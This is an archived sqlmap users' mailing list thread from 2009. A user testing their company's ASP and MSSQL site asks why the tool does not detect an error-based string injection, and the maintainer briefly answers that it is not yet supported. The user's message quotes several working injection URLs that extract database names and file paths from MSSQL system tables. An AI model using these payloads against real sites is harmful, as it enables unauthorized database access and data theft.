Re: [sqlmap-users] sqlmap and string injections
Brought to you by:
inquisb
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:35:55
|
sqlmap supports string injections, but not with the following error based payload. It will come in the long run. Cheers, B On Sun, Dec 6, 2009 at 15:55, One Time <one...@ym...> wrote: > Hi, > Does sqlmap supports string injections? > I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL > 2000) wich is vulnerable to SQL injection. > > Example: > www.xyz.com/default.asp?pag=anypage.asp > "pag" is the injectable parameter > > I'm able to succesfully enumerate users and databases using sqlmap only via > blind sql Injection because for some reason other supported sql injection > methods fail with the error: "[WARNING] for some reasons it was not possible > to retrieve the query output through inband SQL injection technique, sqlmap > is going blind" > > Using other scanners I noticed that it is possible to dump data (for example > databases listing) using queries like these: > www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as > nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top > 27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t > order by [dbid] desc)-- > www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as > nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top > 28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t > order by [dbid] desc)-- > www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as > nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top > 29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t > order by [dbid] desc)-- > ecc.. > This method is really fast (behind proxy too) compared to the extreme > slowness of a blind SQL Injection. > > Why sqlmap doens't detect this type of injection? > > Thank you > Regards > > > ------------------------------------------------------------------------------ > Join us December 9, 2009 for the Red Hat Virtual Experience, > a free event focused on virtualization and cloud computing. > Attend in-depth sessions from your desk. Your couch. Anywhere. > http://p.sf.net/sfu/redhat-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |